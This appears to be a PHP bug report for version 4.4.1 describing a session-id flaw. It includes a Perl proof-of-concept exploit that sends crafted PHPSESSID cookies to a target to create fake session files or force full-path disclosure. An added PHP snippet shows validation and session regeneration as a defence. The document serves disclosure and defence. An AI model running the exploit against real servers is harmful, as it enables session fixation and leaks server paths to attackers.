From: sienicki dot kamil at gmail dot com
Operating system: Linux/Windows (all?)
PHP version: 4.4.1
PHP Bug Type: Unknown/Other Function
Bug description: problem with sessions..
Description:
------------
I wrote a simple exploit to show this vuln.. (I think..) Problem with sessions..

--
#!/usr/bin/perl
#
# PHP vulnerabilities..
#
# Exploit (Proof Of Concept ?) by Kamil 'K3' Sienicki
#
# I found two possibilities of using that bug.. (maybe more)
#
# display_errors must be On
#

use IO::Socket;

if (@ARGV < 3) {
    print "\n";
    print "PHP Exploit (POC)\n";
    print "        by Kamil 'K3' Sienicki\n\n";
    print "1. Create fake session file (sess_fake) in directory (default /tmp).\n";
    print "2. Full path disclosure.\n\n";
    print "Usage: ./php_bug.pl [host] [address] [type of attack (1 or 2)]\n\n";
    exit;
}

# Plain HTTP connection to the target host, port 80
$socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => "$ARGV[0]",
    PeerPort => "80"
) || die "[-] Connect failed! \r\n";

if ($ARGV[2] == 1) {
    print "\n";
    print "PHP Exploit (POC)\n";
    print "        by Kamil 'K3' Sienicki\n\n";
    print "Name of session (default PHPSESSID): ";
    $sess = <STDIN>;
    print "Name of fake sess_file: ";
    $fake = <STDIN>;
    chomp($sess, $fake);
    # The value sent as the session id becomes the name of the session file
    print $socket "GET $ARGV[1] HTTP/1.0\n";
    print $socket "Cookie: $sess=$fake\n\n";
    print "'$fake' fake file was created.. \n";
} elsif ($ARGV[2] == 2) {
    print "\n";
    print "PHP Exploit (POC)\n";
    print "        by Kamil 'K3' Sienicki\n\n";
    print "Name of session (default PHPSESSID): ";
    $sess = <STDIN>;
    chomp($sess);
    print $socket "GET $ARGV[1] HTTP/1.0\n";
    # The original cookie value was mangled by the list archive's address
    # obfuscation ("[EMAIL PROTECTED]"); it is left as it appears there.
    print $socket "Cookie: [EMAIL PROTECTED]\n\n";
    # Echo any PHP warning lines from the response; they contain the script path
    while ($answer = <$socket>) {
        if ($answer =~ m/^...Warning/) {
            print $answer . "\n";
        }
    }
}
--

Reproduce code:
---------------
<?
session_start();
?>

Expected result:
----------------
Warning: session_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /htdocs/sess.php on line 3

Warning: Unknown(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in Unknown on line 0

Warning: Unknown(): Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0

Full path disclosure..
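A defensive counterpart to the report above, added here as an example; it is not part of bug #35429, of the reporter's script, or of PHP itself. It checks the session cookie against the same character set the session module accepts before session_start() ever sees it, keeps warnings (and the script path inside them) out of the response, and regenerates any id the application did not issue. It assumes the default cookie name returned by session_name() and that the session module takes the incoming id from $_COOKIE, so clearing that entry makes session_start() generate a fresh id; the function names and the 128-character length cap are choices made for this example.

```php
<?php
// Added example (not from bug #35429 or from PHP): guard session_start()
// against attacker-supplied session ids.
// Assumption: the session module reads the id from $_COOKIE[session_name()],
// so removing that entry makes session_start() create a new id instead.

// Keep warnings out of the response; they embed the script path.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// True only for ids made of the characters the session module accepts
// (a-z, A-Z, 0-9). The length cap is this example's own hardening limit.
function session_id_is_clean($id)
{
    return is_string($id) && preg_match('/^[a-zA-Z0-9]{1,128}$/', $id) === 1;
}

function start_session_safely()
{
    $name = session_name();   // "PHPSESSID" unless php.ini changes it

    if (isset($_COOKIE[$name]) && !session_id_is_clean($_COOKIE[$name])) {
        // Invalid characters: never hand this value to session_start().
        // Without this, 4.4.1 warns (disclosing the path when display_errors
        // is On) and then fails to write a session file under the bogus name.
        $peer = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
        error_log("rejected malformed session cookie from $peer");
        unset($_COOKIE[$name]);
    }

    session_start();

    // A well-formed but attacker-chosen id (attack 1 in the report) is session
    // fixation: PHP accepts any syntactically valid id. Mark sessions this
    // application issued and replace any id that lacks the mark.
    if (empty($_SESSION['__issued'])) {
        session_regenerate_id();   // available since PHP 4.3.2
        $_SESSION['__issued'] = 1;
    }
}

start_session_safely();
```

Two caveats for a PHP 4.4 deployment: regenerating the id stops an attacker from riding a fixed session, but the files save handler has already opened (and so created) sess_<id> for the attacker-chosen name by the time session_regenerate_id() runs, so a save_path that is not shared with other users matters as much as the check; and later PHP releases close this gap directly with session.use_strict_mode (PHP 5.5.2 and newer), which refuses ids the server did not itself issue.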
--
Edit bug report at http://bugs.php.net/?id=35429&edit=1